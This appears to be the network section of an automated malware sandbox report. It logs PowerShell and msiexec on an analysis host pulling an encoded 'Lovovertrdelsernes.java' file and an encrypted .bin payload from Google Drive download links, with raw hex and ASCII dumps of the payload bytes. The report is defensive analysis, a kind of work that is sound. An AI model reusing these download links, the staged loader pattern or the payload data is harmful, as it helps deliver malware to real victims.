                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:45:02.415553093 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549704142.250.184.2384435972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-01 05:42:59 UTC215OUTGET /uc?export=download&id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.google.com
                                      Connection: Keep-Alive
                                      2024-10-01 05:43:00 UTC1610INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 01 Oct 2024 05:43:00 GMT
                                      Location: https://drive.usercontent.google.com/download?id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u&export=download
                                      Strict-Transport-Security: max-age=31536000
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Cross-Origin-Opener-Policy: same-origin
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Content-Security-Policy: script-src 'nonce-ETYwi3GcMZSYJGiq3zM3iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.549705142.250.184.1934435972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-01 05:43:00 UTC233OUTGET /download?id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u&export=download HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.usercontent.google.com
                                      Connection: Keep-Alive
                                      2024-10-01 05:43:03 UTC4863INHTTP/1.1 200 OK
                                      Content-Type: application/octet-stream
                                      Content-Security-Policy: sandbox
                                      Content-Security-Policy: default-src 'none'
                                      Content-Security-Policy: frame-ancestors 'none'
                                      X-Content-Security-Policy: sandbox
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Resource-Policy: same-site
                                      X-Content-Type-Options: nosniff
                                      Content-Disposition: attachment; filename="Lovovertrdelsernes.java"
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Credentials: false
                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                      Accept-Ranges: bytes
                                      Content-Length: 461600
                                      Last-Modified: Mon, 30 Sep 2024 15:41:27 GMT
                                      X-GUploader-UploadID: AD-8ljtQdqFGMWAg1wXg0iqct37r38m91EeDng55iluWvO1XGukXmZgmBw8IzQ3JwGf-n7QBA21nbacpKA
                                      Date: Tue, 01 Oct 2024 05:43:03 GMT
                                      Expires: Tue, 01 Oct 2024 05:43:03 GMT
                                      Cache-Control: private, max-age=0
                                      X-Goog-Hash: crc32c=5a6jEw==
                                      Server: UploadServer
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close
                                      2024-10-01 05:43:03 UTC4863INData Raw: 36 77 4a 47 4e 58 45 42 6d 37 74 54 4b 52 45 41 63 51 47 62 63 51 47 62 41 31 77 6b 42 4f 73 43 6a 30 6c 78 41 5a 75 35 33 6c 6b 4e 47 2b 73 43 2b 78 46 78 41 5a 75 42 36 63 36 4d 33 77 70 78 41 5a 74 78 41 5a 75 42 38 52 44 4e 4c 52 42 78 41 5a 76 72 41 71 4a 79 36 77 4b 4d 4b 58 45 42 6d 37 72 4d 33 62 48 70 63 51 47 62 63 51 47 62 63 51 47 62 36 77 4c 65 61 44 48 4b 63 51 47 62 63 51 47 62 69 52 51 4c 36 77 4b 64 59 58 45 42 6d 39 48 69 36 77 4b 72 78 48 45 42 6d 34 50 42 42 4f 73 43 6c 33 72 72 41 6f 53 31 67 66 6c 74 71 58 49 44 66 4d 76 72 41 6a 61 4b 36 77 4b 33 67 6f 74 45 4a 41 52 78 41 5a 76 72 41 6f 5a 4d 69 63 50 72 41 76 72 61 63 51 47 62 67 63 4f 42 50 4c 55 42 36 77 4b 70 61 2b 73 43 47 43 4b 36 41 48 52 72 50 75 73 43 52 47 6e 72 41 6b 31
                                      Data Ascii: 6wJGNXEBm7tTKREAcQGbcQGbA1wkBOsCj0lxAZu53lkNG+sC+xFxAZuB6c6M3wpxAZtxAZuB8RDNLRBxAZvrAqJy6wKMKXEBm7rM3bHpcQGbcQGbcQGb6wLeaDHKcQGbcQGbiRQL6wKdYXEBm9Hi6wKrxHEBm4PBBOsCl3rrAoS1gfltqXIDfMvrAjaK6wK3gotEJARxAZvrAoZMicPrAvracQGbgcOBPLUB6wKpa+sCGCK6AHRrPusCRGnrAk1
                                      2024-10-01 05:43:03 UTC4863INData Raw: 58 50 45 4c 39 43 62 33 2f 39 51 6d 39 2f 31 36 4e 36 6b 5a 52 43 65 63 7a 50 74 58 4e 4f 75 36 77 72 61 53 38 78 70 4c 78 57 56 6b 32 30 52 37 63 70 66 7a 30 62 62 77 49 65 41 78 2b 36 4a 74 36 31 5a 4f 48 56 50 45 7a 64 4f 69 6d 58 67 71 7a 34 74 6a 65 4d 4b 4e 77 39 32 64 2f 30 56 36 53 54 69 54 69 45 39 52 6d 7a 54 32 38 53 59 48 46 2f 45 30 50 61 64 46 5a 66 71 4a 39 31 67 78 44 35 73 30 48 67 43 6a 4e 55 77 6d 39 52 62 57 2b 66 32 4c 51 2b 33 58 4f 41 42 64 78 7a 5a 73 6a 43 43 48 38 42 4e 57 70 68 54 44 58 33 46 43 6f 50 51 61 62 6a 4e 47 33 4d 6f 2b 61 49 48 69 57 68 70 46 32 4b 30 32 74 35 36 62 43 2f 35 58 35 4a 58 68 54 4e 68 72 41 6e 68 46 54 35 43 6d 49 56 32 49 54 2b 79 56 2b 75 32 54 2b 58 72 74 62 63 59 76 36 75 59 51 6b 54 33 57 70 50 4b
                                      Data Ascii: XPEL9Cb3/9Qm9/16N6kZRCeczPtXNOu6wraS8xpLxWVk20R7cpfz0bbwIeAx+6Jt61ZOHVPEzdOimXgqz4tjeMKNw92d/0V6STiTiE9RmzT28SYHF/E0PadFZfqJ91gxD5s0HgCjNUwm9RbW+f2LQ+3XOABdxzZsjCCH8BNWphTDX3FCoPQabjNG3Mo+aIHiWhpF2K02t56bC/5X5JXhTNhrAnhFT5CmIV2IT+yV+u2T+XrtbcYv6uYQkT3WpPK
                                      2024-10-01 05:43:03 UTC110INData Raw: 45 4a 76 64 55 6d 56 72 47 42 73 50 70 56 6b 66 2f 65 4e 76 36 7a 2b 33 6b 2b 45 43 55 4a 2f 43 39 66 4e 6b 70 46 43 37 33 2f 41 62 48 78 50 6b 77 77 75 43 59 77 69 36 33 36 6f 46 62 64 53 64 67 5a 77 45 6c 69 2b 49 4c 39 41 56 7a 46 79 2f 2f 65 4b 68 70 49 4c 4f 46 57 32 2b 32 53 53 50 4a 4e 6a 6c 63 4f 63 31 70 51 41 48 64 6e
                                      Data Ascii: EJvdUmVrGBsPpVkf/eNv6z+3k+ECUJ/C9fNkpFC73/AbHxPkwwuCYwi636oFbdSdgZwEli+IL9AVzFy//eKhpILOFW2+2SSPJNjlcOc1pQAHdn
                                      2024-10-01 05:43:03 UTC1390INData Raw: 66 72 67 4c 4d 48 65 4c 55 62 4c 2f 6a 32 79 39 2f 31 45 4a 76 66 39 52 43 62 33 2f 55 51 6d 39 2f 31 45 4a 76 66 39 52 43 62 33 2f 61 36 4e 66 6c 73 76 52 51 6b 6f 52 43 4c 33 2f 75 64 49 5a 2b 31 45 47 76 4d 77 69 43 62 33 2f 55 51 6d 39 2f 31 45 4a 76 66 39 52 43 62 33 2f 55 51 6d 39 2f 31 45 4a 76 63 79 6c 79 67 6d 31 69 6a 4f 48 6a 55 34 44 59 6b 76 2f 53 2b 74 42 70 41 31 54 7a 64 44 2f 49 5a 52 6b 4c 6a 77 35 78 70 69 5a 46 51 47 56 4e 42 39 51 4f 53 44 48 67 48 4b 33 45 39 48 49 50 43 6d 52 34 4b 65 4c 72 4b 6f 67 30 48 69 70 37 6a 66 53 58 46 31 51 50 65 79 6d 78 35 44 65 59 68 4e 70 6a 6a 4f 5a 31 4e 72 6c 43 5a 52 50 34 33 51 57 44 54 52 36 50 51 69 39 2f 7a 6d 55 2f 6d 47 70 69 49 6e 62 36 41 45 69 2b 4e 41 39 6d 64 72 7a 37 44 56 2b 5a 53 32
                                      Data Ascii: frgLMHeLUbL/j2y9/1EJvf9RCb3/UQm9/1EJvf9RCb3/a6NflsvRQkoRCL3/udIZ+1EGvMwiCb3/UQm9/1EJvf9RCb3/UQm9/1EJvcylygm1ijOHjU4DYkv/S+tBpA1TzdD/IZRkLjw5xpiZFQGVNB9QOSDHgHK3E9HIPCmR4KeLrKog0Hip7jfSXF1QPeymx5DeYhNpjjOZ1NrlCZRP43QWDTR6PQi9/zmU/mGpiInb6AEi+NA9mdrz7DV+ZS2
                                      2024-10-01 05:43:03 UTC1390INData Raw: 69 41 64 4d 77 68 76 50 39 52 42 72 30 6c 38 67 6d 39 2f 31 45 4a 76 66 39 52 43 62 33 2f 55 51 6d 39 2f 31 45 4a 76 66 39 52 43 62 33 45 61 48 62 71 70 79 47 39 4e 4b 64 55 2b 72 49 34 59 51 6d 39 2f 31 45 4a 76 66 39 52 43 62 33 2f 55 51 6d 39 2f 31 45 4a 76 66 39 52 43 62 33 56 35 48 67 6d 76 33 63 73 50 79 64 6e 6c 5a 58 61 37 49 77 78 49 67 55 55 4a 65 4e 2b 42 72 77 4f 30 51 6d 39 2f 31 45 4a 76 66 39 52 43 62 33 2f 55 51 6d 39 2f 31 45 4a 76 66 39 52 43 62 33 55 71 51 55 35 47 47 44 72 39 70 77 34 31 55 77 47 47 65 59 79 44 70 44 58 4f 43 42 30 70 62 4c 2f 6a 34 75 39 2f 31 45 4a 76 66 39 52 43 62 33 2f 55 51 6d 39 2f 31 45 4a 76 66 39 52 43 62 33 2f 5a 62 43 6e 75 2f 63 76 6d 2f 47 64 68 79 46 61 6c 2b 7a 37 57 56 42 41 39 74 61 57 53 72 48 39 55
                                      Data Ascii: iAdMwhvP9RBr0l8gm9/1EJvf9RCb3/UQm9/1EJvf9RCb3EaHbqpyG9NKdU+rI4YQm9/1EJvf9RCb3/UQm9/1EJvf9RCb3V5Hgmv3csPydnlZXa7IwxIgUUJeN+BrwO0Qm9/1EJvf9RCb3/UQm9/1EJvf9RCb3UqQU5GGDr9pw41UwGGeYyDpDXOCB0pbL/j4u9/1EJvf9RCb3/UQm9/1EJvf9RCb3/ZbCnu/cvm/GdhyFal+z7WVBA9taWSrH9U
                                      2024-10-01 05:43:03 UTC1390INData Raw: 31 50 44 47 2b 30 64 66 38 43 4e 38 6d 43 53 4d 56 34 39 64 50 36 45 53 38 31 73 74 34 50 71 72 58 33 61 6e 42 32 48 7a 5a 5a 7a 37 46 4d 51 34 56 57 6a 5a 7a 33 54 49 73 50 4d 33 6f 41 4e 36 44 6f 6a 41 67 30 50 52 76 66 39 65 68 44 70 39 55 51 6e 6e 66 6d 55 74 2b 4e 50 54 6c 7a 7a 37 64 61 6e 71 41 2f 54 32 79 4e 73 35 66 41 6f 2f 50 59 69 4a 32 33 57 67 6e 57 4c 51 4a 5a 6e 69 7a 2f 61 77 66 6d 55 74 69 58 2b 78 36 72 49 34 61 70 47 39 2f 31 45 4a 76 66 39 52 43 62 33 2f 55 51 6d 39 2f 31 45 4a 76 66 39 52 43 62 33 2f 59 2b 57 4c 78 75 53 59 32 78 59 38 4a 36 36 4c 5a 64 55 30 51 6a 67 4c 76 66 2f 75 68 4f 58 4c 32 73 58 4f 73 4a 62 45 46 4d 2f 51 43 47 78 58 4d 71 48 32 47 78 48 33 58 4c 6b 73 32 43 2b 41 63 65 34 51 79 53 38 34 6c 5a 76 63 49 44 70
                                      Data Ascii: 1PDG+0df8CN8mCSMV49dP6ES81st4PqrX3anB2HzZZz7FMQ4VWjZz3TIsPM3oAN6DojAg0PRvf9ehDp9UQnnfmUt+NPTlzz7danqA/T2yNs5fAo/PYiJ23WgnWLQJZniz/awfmUtiX+x6rI4apG9/1EJvf9RCb3/UQm9/1EJvf9RCb3/Y+WLxuSY2xY8J66LZdU0QjgLvf/uhOXL2sXOsJbEFM/QCGxXMqH2GxH3XLks2C+Ace4QyS84lZvcIDp
                                      2024-10-01 05:43:03 UTC1390INData Raw: 64 6c 44 49 54 37 34 6b 36 43 49 48 56 51 43 62 30 58 6c 33 71 35 2f 77 61 32 7a 33 53 39 4a 44 77 49 54 43 68 49 73 4e 44 4f 44 39 79 32 6c 44 54 67 45 63 6a 41 33 4f 72 56 50 55 72 50 7a 63 4a 2f 69 41 32 39 42 58 67 51 30 4d 6b 44 2b 46 4c 2b 62 2f 79 54 45 73 74 4a 7a 79 7a 70 53 75 4b 70 37 30 32 41 62 44 32 49 55 38 4c 4f 35 49 64 2b 76 77 6c 61 55 48 43 49 65 77 59 59 41 30 32 75 7a 59 42 63 2f 6d 43 55 32 38 61 68 65 71 61 70 70 41 64 53 63 6e 75 76 70 64 7a 71 32 35 4a 37 42 47 4d 32 49 43 34 75 42 68 62 46 41 76 33 41 72 76 33 77 6e 53 5a 6e 64 41 34 46 61 54 6b 43 43 44 58 49 6f 51 4f 7a 57 79 33 77 46 7a 77 4e 68 50 5a 46 61 39 44 37 65 6a 77 49 67 7a 54 74 42 78 4a 69 62 73 6a 48 5a 62 4f 47 68 69 31 63 4b 62 6f 6c 74 33 51 2f 30 77 34 43 56
                                      Data Ascii: dlDIT74k6CIHVQCb0Xl3q5/wa2z3S9JDwITChIsNDOD9y2lDTgEcjA3OrVPUrPzcJ/iA29BXgQ0MkD+FL+b/yTEstJzyzpSuKp702AbD2IU8LO5Id+vwlaUHCIewYYA02uzYBc/mCU28aheqappAdScnuvpdzq25J7BGM2IC4uBhbFAv3Arv3wnSZndA4FaTkCCDXIoQOzWy3wFzwNhPZFa9D7ejwIgzTtBxJibsjHZbOGhi1cKbolt3Q/0w4CV
                                      2024-10-01 05:43:03 UTC1390INData Raw: 63 33 51 34 4a 6f 68 4f 49 2f 48 43 46 6e 36 36 34 71 6b 64 6d 6f 68 2b 41 31 32 65 6b 61 33 4e 67 46 2f 2b 53 35 51 34 4c 69 49 46 73 45 39 4d 65 72 50 64 52 69 33 6b 7a 65 69 74 7a 58 66 42 6c 58 68 59 6a 58 59 4e 4e 4e 42 6b 6a 2b 56 44 43 2f 32 75 6d 33 33 54 70 30 39 32 4b 59 31 70 32 4f 64 37 69 46 4b 47 65 6b 51 4c 76 66 39 65 68 4a 37 37 55 51 6d 79 4f 47 65 59 76 66 39 52 43 62 33 2f 55 51 6d 39 2f 31 45 4a 76 66 39 52 43 62 33 2f 55 51 6d 39 2f 33 72 7a 33 74 47 2b 65 62 32 70 70 36 6b 4e 73 65 37 68 74 63 51 43 35 30 49 74 41 4e 7a 73 6c 79 2f 37 55 6f 58 51 4a 5a 6d 7a 76 75 47 6f 71 65 39 53 5a 51 34 49 69 46 4e 61 4c 58 54 52 66 70 64 44 47 48 52 44 57 43 46 32 73 41 43 4d 59 6a 63 77 62 34 70 4d 4e 64 49 2f 62 32 6f 52 49 39 58 49 6c 70 53
                                      Data Ascii: c3Q4JohOI/HCFn664qkdmoh+A12eka3NgF/+S5Q4LiIFsE9MerPdRi3kzeitzXfBlXhYjXYNNNBkj+VDC/2um33Tp092KY1p2Od7iFKGekQLvf9ehJ77UQmyOGeYvf9RCb3/UQm9/1EJvf9RCb3/UQm9/3rz3tG+eb2pp6kNse7htcQC50ItANzsly/7UoXQJZmzvuGoqe9SZQ4IiFNaLXTRfpdDGHRDWCF2sACMYjcwb4pMNdI/b2oRI9XIlpS
                                      2024-10-01 05:43:03 UTC1390INData Raw: 6e 55 79 73 72 6f 71 78 79 34 50 35 70 6a 50 56 32 72 75 47 41 63 52 32 46 34 45 6d 2f 49 62 6c 62 50 36 2f 6d 42 59 7a 4e 69 56 4d 42 30 35 48 46 4a 47 66 67 76 67 57 43 46 43 41 36 4d 64 36 46 38 54 68 76 4f 34 31 38 44 45 42 50 35 69 58 36 6e 68 75 71 75 37 34 68 54 71 48 65 70 4e 33 5a 48 34 36 73 6b 61 71 30 47 77 44 75 69 49 57 7a 6b 57 49 67 73 7a 47 37 4f 53 69 61 42 45 2f 51 35 44 65 39 65 44 56 64 2f 39 31 47 43 36 4e 75 35 42 43 6a 37 55 59 44 74 2b 39 70 45 6f 55 57 71 62 76 72 68 75 59 4c 6d 2b 31 48 46 49 6d 41 48 52 35 47 64 38 4d 78 66 37 43 71 4b 74 4b 45 6f 32 68 71 6e 43 33 4c 36 54 2b 75 2f 77 38 50 2b 2b 49 30 66 78 6a 46 37 65 39 46 68 38 48 62 73 55 72 2f 2f 55 56 6f 47 38 44 4f 74 6f 33 36 69 32 64 4a 64 37 49 68 2b 61 56 36 66 35
                                      Data Ascii: nUysroqxy4P5pjPV2ruGAcR2F4Em/IblbP6/mBYzNiVMB05HFJGfgvgWCFCA6Md6F8ThvO418DEBP5iX6nhuqu74hTqHepN3ZH46skaq0GwDuiIWzkWIgszG7OSiaBE/Q5De9eDVd/91GC6Nu5BCj7UYDt+9pEoUWqbvrhuYLm+1HFImAHR5Gd8Mxf7CqKtKEo2hqnC3L6T+u/w8P++I0fxjF7e9Fh8HbsUr//UVoG8DOto36i2dJd7Ih+aV6f5
                                      2024-10-01 05:43:03 UTC1390INData Raw: 32 49 4e 6c 6c 59 5a 77 50 55 63 70 2b 35 53 69 6f 56 72 6b 6e 31 57 36 4d 77 78 58 46 47 32 54 44 57 4b 6f 6f 63 30 31 46 32 73 44 73 41 68 62 42 31 6f 63 52 69 5a 2b 6f 30 66 69 4b 32 4f 49 54 38 66 31 4a 47 74 2b 6f 33 4f 67 53 53 36 41 6a 77 69 6a 47 38 31 38 69 46 45 66 4a 79 4c 79 51 31 56 58 6b 79 56 4e 6f 68 67 6e 59 6f 30 6d 63 38 74 4e 6e 57 41 5a 51 58 4a 65 39 33 6e 35 2f 73 6f 36 54 42 46 34 38 6a 6c 56 70 64 70 45 6f 55 56 73 4a 42 63 63 75 59 72 71 2b 31 46 61 42 68 74 79 72 35 56 2b 6f 68 71 69 48 53 69 49 66 76 61 56 73 68 4f 70 7a 59 42 62 2f 6b 2b 55 68 41 34 74 4b 6c 65 30 74 63 30 76 49 77 69 57 2b 6a 67 35 6f 59 67 4a 6c 53 51 5a 51 42 42 74 63 5a 37 37 68 34 44 45 76 47 77 58 44 62 67 38 73 31 35 63 30 38 65 5a 31 4e 76 6a 65 70 42
                                      Data Ascii: 2INllYZwPUcp+5SioVrkn1W6MwxXFG2TDWKooc01F2sDsAhbB1ocRiZ+o0fiK2OIT8f1JGt+o3OgSS6AjwijG818iFEfJyLyQ1VXkyVNohgnYo0mc8tNnWAZQXJe93n5/so6TBF48jlVpdpEoUVsJBccuYrq+1FaBhtyr5V+ohqiHSiIfvaVshOpzYBb/k+UhA4tKle0tc0vIwiW+jg5oYgJlSQZQBBtcZ77h4DEvGwXDbg8s15c08eZ1NvjepB


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.549714142.250.184.2384432584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-01 05:43:29 UTC216OUTGET /uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.google.com
                                      Cache-Control: no-cache
                                      2024-10-01 05:43:30 UTC1610INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 01 Oct 2024 05:43:29 GMT
                                      Location: https://drive.usercontent.google.com/download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download
                                      Strict-Transport-Security: max-age=31536000
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Content-Security-Policy: script-src 'nonce-7RGCKwi8ZZiZef2kQj1jng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Cross-Origin-Opener-Policy: same-origin
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.549715142.250.184.1934432584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      2024-10-01 05:43:30 UTC258OUTGET /download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Cache-Control: no-cache
                                      Host: drive.usercontent.google.com
                                      Connection: Keep-Alive
                                      2024-10-01 05:43:33 UTC4859INHTTP/1.1 200 OK
                                      Content-Type: application/octet-stream
                                      Content-Security-Policy: sandbox
                                      Content-Security-Policy: default-src 'none'
                                      Content-Security-Policy: frame-ancestors 'none'
                                      X-Content-Security-Policy: sandbox
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Resource-Policy: same-site
                                      X-Content-Type-Options: nosniff
                                      Content-Disposition: attachment; filename="sLgRDOfJZMJPu27.bin"
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Credentials: false
                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                      Accept-Ranges: bytes
                                      Content-Length: 106560
                                      Last-Modified: Mon, 30 Sep 2024 03:50:27 GMT
                                      X-GUploader-UploadID: AD-8ljs8LNtVlCl38hmDctzdQXjopGoXcFXuD6upukhqf9JpbgqzXPTrB8NFTRnk7KmKcr3gaqaLPji9LA
                                      Date: Tue, 01 Oct 2024 05:43:33 GMT
                                      Expires: Tue, 01 Oct 2024 05:43:33 GMT
                                      Cache-Control: private, max-age=0
                                      X-Goog-Hash: crc32c=p83L0w==
                                      Server: UploadServer
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close
                                      2024-10-01 05:43:33 UTC4859INData Raw: b8 07 0c 49 27 ce aa e4 0a 98 3b 76 f9 30 60 ec 72 9a d6 19 43 3c ab 37 e3 98 7e 24 c7 3a 7e 9b ee fd a4 1d c4 7a b3 4f 4f 5b 4d b3 f8 99 24 df 0d af 8e 34 18 17 17 e9 b0 85 05 23 62 eb a3 a9 b9 e1 d8 cb b9 c1 9b 65 8a 7d 99 85 4b de 44 35 09 f4 ac d2 18 25 27 10 eb 2f 6b 01 00 20 75 b5 cf 59 89 01 3b 86 5d 9b 5c 1a 9f b3 59 f6 e9 de bc 3c 45 3e 8c 1b 0d 7f 67 55 9b e7 a9 e2 42 cf 59 b8 d7 08 f6 b2 f6 22 40 da 7a b5 2b f7 bf f8 57 8c 06 2c a8 8e 25 2d 2e fe d4 f1 4c 7b 76 19 5e 73 71 a5 a2 24 a2 9d 78 a4 d9 4e fc a9 fb c8 93 b9 1f 4d a1 da 1d f7 7c e3 2b 1b e8 4f 14 b8 18 a9 7a 48 9c b2 8f 9e 7c 03 f2 e4 ff a5 a3 91 45 32 b4 7f 57 0c f4 9a 87 27 00 96 5c 13 99 46 5c ed b4 0b a9 6c 47 b4 ca 34 c3 e3 b8 de 33 1d b1 ac 73 c7 d9 d5 61 9b 12 97 3b 32 20 c0 7f
                                      Data Ascii: I';v0`rC<7~$:~zOO[M$4#be}KD5%'/k uY;]\Y<E>gUBY"@z+W,%-.L{v^sq$xNM|+OzH|E2W'\F\lG43sa;2
